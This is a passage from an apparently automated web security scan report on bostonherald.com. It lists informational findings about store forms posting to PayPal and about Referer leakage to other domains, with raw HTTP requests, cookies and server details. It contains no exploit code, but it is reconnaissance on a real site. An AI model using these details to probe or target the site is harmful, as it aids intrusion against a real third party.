
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/
/store/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

7.1. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

7.2. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

7.3. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.4. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.5. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.6. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
submit
display

Request

Response

7.7. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.8. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.9. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.10. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

7.11. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

7.12. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.13. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

7.14. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.15. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.16. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

7.17. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.18. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

Response

7.19. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

7.20. http://bostonherald.com/store/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

submit
add
cmd
business
item_name
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

8. Cross-domain Referer leakage previous next
There are 53 instances of this issue:

/
/blogs/entertainment/the_assistant/
/blogs/lifestyle/fork_lift/
/business/
/business/general/view.bg
/business/healthcare/
/entertainment/
/entertainment/arts_culture/view.bg
/galleries/index.php
/homepage.bg
/includes/PointRollAds.htm
/index.bg
/jobfind/
/mediacenter/index.php
/mediacenter/video.php
/mediacenter/video.php
/news/
/news/columnists/
/news/columnists/view.bg
/news/columnists/view.bg
/news/document.bg
/news/international/
/news/international/europe/view.bg
/news/national/
/news/offbeat/
/news/opinion/
/news/opinion/editorials/view.bg
/news/police_logs/
/news/politics/
/news/politics/view.bg
/news/politics/view.bg
/news/regional/
/news/regional/view.bg
/news/regional/view.bg
/news/regional/view.bg
/news/us_politics/
/photobox/index.bg
/projects/your_tax_dollars.bg
/search/
/search/
/search/
/search/
/sports/
/sports/baseball/red_sox/view.bg
/sports/columnists/
/sports/columnists/view.bg
/sports/football/patriots/view.bg
/sports/football/patriots/view.bg
/sports/football/patriots/view.bg
/track/
/track/inside_track/view.bg
/track/star_tracks/
/track/star_tracks/view.bg

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

8.1. http://bostonherald.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/?showResults=1#results

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=
http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/blogs/lifestyle/behind_the_wheel/wp-content/uploads/2010/11/nashstreetrod.jpg
http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg
http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2010/11/neil-entwistle.JPG
http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2010/11/kgscream.JPG
http://cache.heraldinteractive.com/blogs/sports/high_school/wp-content/uploads/2010/11/img_0192.JPG
http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2010/11/brady-and-lloyd.jpg
http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2010/11/theoheraldfile.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif
http://cache.heraldinteractive.com/images/siteImages/weather/03.gif
http://cache.heraldinteractive.com/images/siteImages/weather/04.gif
http://cache.heraldinteractive.com/images/siteImages/weather/12.gif
http://cache.heraldinteractive.com/images/siteImages/weather/18.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordan_177x57.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/carousel.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg
http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/b3cddd_dwoodhead11052010.jpg
http://multimedia.heraldinteractive.com/images/20101106/5187df_ltpdvd20101107.jpg
http://multimedia.heraldinteractive.com/images/20101106/d5c5f8_Tyler_09192010.JPG
http://multimedia.heraldinteractive.com/images/20101107/stp/0b0f8e_stab_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/0b646b_killer_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/4348cc_bomb_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/8b11c8_ltpfranco20101107_edited-1.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/b6c328_sal_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/b9b0fc_sassy_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/bc9344_coak_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/c595ca_ltpconan20101108.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/49db30_seat_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/3e9f16_becks_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/590145_aaron_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/c2266a_zen_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg
http://multimedia.heraldinteractive.com/images/419a149cad_music07072009.jpg
http://multimedia.heraldinteractive.com/images/promo/20101107/369b895a4c_funetease_11082010.jpg
http://multimedia.heraldinteractive.com/images/promo/20101107/e5caeeddd1_OnTheT_210x45.jpg
http://multimedia.heraldinteractive.com/images/promo/20101108/913f79de63_bradytease_11082010.jpg
http://multimedia.heraldinteractive.com/images/promo/backpdf_11072010.jpg
http://multimedia.heraldinteractive.com/images/promo/frontpdf_11072010.jpg
http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/individual.aspx?team=028
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.carfind.com/?srvc=home&position=also
http://www.carfind.com/sellCar.bg
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.homefind.com/?listingid=HF5728980
http://www.homefind.com/?srvc=home&position=also
http://www.homefind.com/for-agents/
http://www.homefind.com/post-property/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.massliteracy.org/
http://www.people2people.com/?connect=boshrld&page=login
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.shoplocal.com/bostonherald/
http://www.uclick.com/client/boh/sudoc/

Request

GET /?showResults=1#results HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:12:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 149923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/business/real_estate/view/20101108salvatore_lupoli/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/b6c328_sal_11082010.jpg" alt="LAWRENCE REVIVAL: Salvatore Lupoli, chief executive of Sal’s Pizza, displays an aerial photo of his Riverwalk Properties
complex, where he has started on a second phase of construction."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/business/real_estate/view/20101108salvatore_lupoli/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/regional/view/20101109close_shave_for_wife_killer_doc_transsexual_just_needs_more_razors/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/0b646b_killer_11082010.jpg" alt="Robert ‘Michele’ Kosilek."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20101109close_shave_for_wife_killer_doc_transsexual_just_needs_more_razors/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/track/inside_track/view/20101108because_sassy_gay_friend_says_so/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/b9b0fc_sassy_11082010.jpg" alt="‘Sassy Gay Friend’ YouTube star Brian Gallivan."></a>
...[SNIP]...
<a href="/entertainment/television/general/view/20101108hot_coco_timing_is_ideal_for_conans_return_to_late-night_wars/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20101107/stp/c595ca_ltpconan20101108.jpg" alt="Conan O’Brien returns tonight with “Conan,” running Monday through Thursdays at 11 p.m. on TBS."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/television/general/view/20101108hot_coco_timing_is_ideal_for_conans_return_to_late-night_wars/format=comments&srvc=home&position=7">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/sports/other_sports/general/view.bg?articleid=1294823&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20101105/stp/b3cddd_dwoodhead11052010.jpg" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/news/columnists/view.bg?articleid=1294174&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1288456&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordan_177x57.gif" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
